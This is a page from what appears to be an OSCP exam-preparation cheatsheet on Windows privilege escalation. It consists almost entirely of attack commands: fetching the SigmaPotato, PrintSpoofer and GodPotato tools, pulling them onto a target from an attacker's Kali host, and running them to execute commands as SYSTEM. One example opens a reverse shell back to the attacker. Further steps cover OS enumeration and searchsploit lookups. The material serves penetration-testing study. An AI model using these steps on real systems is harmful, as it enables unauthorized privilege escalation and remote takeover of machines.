OSCP Cheatsheet
  • Reference List
  • Basic
  • Methodology
    • Basic Scans
    • Service Enumeration
      • TCP: HTTP(S) - 80 / 443
      • TCP: SMB - 139 / 445
      • TCP: FTP - 21
      • TCP/UDP: DNS - 53
      • TCP: SSH - 22
      • TCP/UDP: LDAP - 389 / 636 / 3268
      • TCP/UDP: Kerberos - 88
      • UDP: SNMP - 161
      • TCP: SMTP - 25
      • TCP: RDP - 3389
      • TCP: RPC - 135 / 593
      • TCP: Evil-WinRM - 5985 / 5986
      • TCP: MYSQL - 3306
      • TCP: MSSQL - 1433
      • TCP: Confluence - 8090
    • Extras
  • File Transfer
  • KeePass Database
  • Shells
  • Enumeration
    • Linux
    • Windows
    • Git
  • Privilege Escalation
    • Linux
      • Abusing Cron Jobs
      • Abusing Password Authentication
      • Abusing Setuid Binaries and Capabilities
      • Abusing Sudo
      • Exploits
    • Windows
      • Service Binary Hijacking
      • DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Exploits
  • Port Forwarding
    • Linux
    • Windows
  • Attacks
    • Public Exploits
    • User Creation
    • Password Cracking
      • Custom Rules
      • Custom Password List
    • Phishing
    • SQLi
  • Active Directory
    • Enumeration
    • Attack
    • Lateral Movement
    • Persistence
Powered by GitBook
On this page
  • SigmaPotato.exe
  • PrintSpoof.exe
  • GodPotato.exe
  • SearchSploit
  1. Privilege Escalation
  2. Windows

Exploits

SigmaPotato.exe

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
1

Download SigmaPotato.exe into target machine

iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe
2

Execute command

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

EXAMPLE: Send reverse shell back

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

PrintSpoof.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
1

Download PrintSpoofer.exe

iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe
2

Execute Command

PrintSpoofer.exe -i -c <Command To Execute>

GodPotato.exe

NOTE: Know the version by the following

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
1

Download GodPotato.exe

iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe
2

Execute command

./GodPotato.exe -cmd "<Command to execute>"

SearchSploit

1

Windows Enumeration

Identify OS name, version, architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic os get Caption, Version. OSArchitecture
2

Search exploit in SearchSploit

searchspoilt <Key Word>

EXAMPLE:

searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"
3

Download exploit

searchsploit -m <EDB-ID>
PreviousScheduled TasksNextPort Forwarding

Last updated 20 days ago

NOTE: Get Windows Build Version from .

here